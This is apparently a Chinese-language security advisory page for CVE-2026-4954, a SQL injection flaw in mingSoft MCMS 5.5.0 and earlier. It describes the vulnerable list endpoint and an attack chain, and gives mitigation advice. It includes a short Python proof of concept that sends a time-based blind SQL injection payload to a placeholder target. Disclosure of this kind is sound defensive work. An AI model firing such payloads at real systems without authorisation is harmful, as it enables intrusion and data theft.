CVE-2026-4954 CVSS 6.3 中危

CVE-2026-4954 mingSoft MCMS SQL注入漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4954

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

mingSoft MCMS

漏洞概述

mingSoft MCMS内容管理系统在5.5.0及更早的版本中被发现存在一处安全隐患。该问题具体出现在Web内容列表端点组件下的`net/mingsoft/cms/action/web/ContentAction.java`文件中的list函数。由于未能对传入的参数进行有效的安全过滤，导致系统容易受到SQL注入攻击。攻击者可利用此漏洞远程发起攻击，进而窃取数据库信息或破坏数据完整性。鉴于利用细节已公之于众，且攻击无需用户交互，建议相关管理员尽快采取措施修复。

技术细节

该漏洞的根本原因在于mingSoft MCMS的Web Content List Endpoint实现中存在输入验证缺失。具体受影响的代码位于`net/mingsoft/cms/action/web/ContentAction.java`文件的`list`方法。在该方法处理用户请求时，直接将外部可控的参数拼接到了SQL查询语句中，或者使用了不安全的ORM查询方式，未进行预编译处理。攻击者可以向受影响的端点发送特制的HTTP请求。由于CVSS向量为PR:L（低权限），攻击者可能只需要一个低权限账号即可利用。通过在请求参数中注入恶意SQL构造（如UNION SELECT或布尔盲注语句），攻击者可以欺骗后端数据库执行非预期的命令。这可能导致敏感数据泄露（如用户名、密码哈希）、绕过认证或修改数据库内容。

攻击链分析

STEP 1

侦察

攻击者使用网络扫描工具识别互联网上运行的mingSoft MCMS系统，并确认其版本低于5.5.0。

STEP 2

获取权限

根据CVSS PR:L指标，攻击者注册或获取一个低权限用户账号，准备好会话凭证。

STEP 3

漏洞利用

攻击者向`net/mingsoft/cms/action/web/ContentAction.java`对应的`list`接口发送包含SQL注入恶意代码的HTTP请求。

STEP 4

数据窃取

通过利用SQL注入漏洞，攻击者从数据库中提取敏感信息（如管理员密码哈希、用户数据），或在数据库中执行写入操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "http://target.com/cms/content/list"

# Malicious payload to test SQL Injection
# This payload attempts a time-based blind injection check
payload = {
    "categoryId": "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -"
}

try:
    print("[*] Sending payload to target...")
    response = requests.get(target_url, params=payload, timeout=10)

    # Analyze response time to confirm vulnerability
    if response.elapsed.total_seconds() > 5:
        print("[+] Vulnerability confirmed! The application responded with a delay.")
    else:
        print("[-] Target may not be vulnerable or payload failed.")

except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

mingSoft MCMS <= 5.5.0

防御指南

临时缓解措施

在未进行完整版本升级前，建议管理员通过防火墙规则限制对`/cms/content/list`接口的外部访问，仅允许可信的内网IP调用。同时，应检查系统日志，排查是否已有针对该漏洞的攻击尝试或成功入侵记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4954
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4954
3 Details https://www.cvedetails.com/cve/CVE-2026-4954/
4 VulDB https://vuldb.com/cve/CVE-2026-4954
5 Link https://github.com/wing3e/public_exp/issues/4
6 Link https://vuldb.com/?ctiid.353832
7 Link https://vuldb.com/?id.353832
8 Link https://vuldb.com/?submit.777533

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表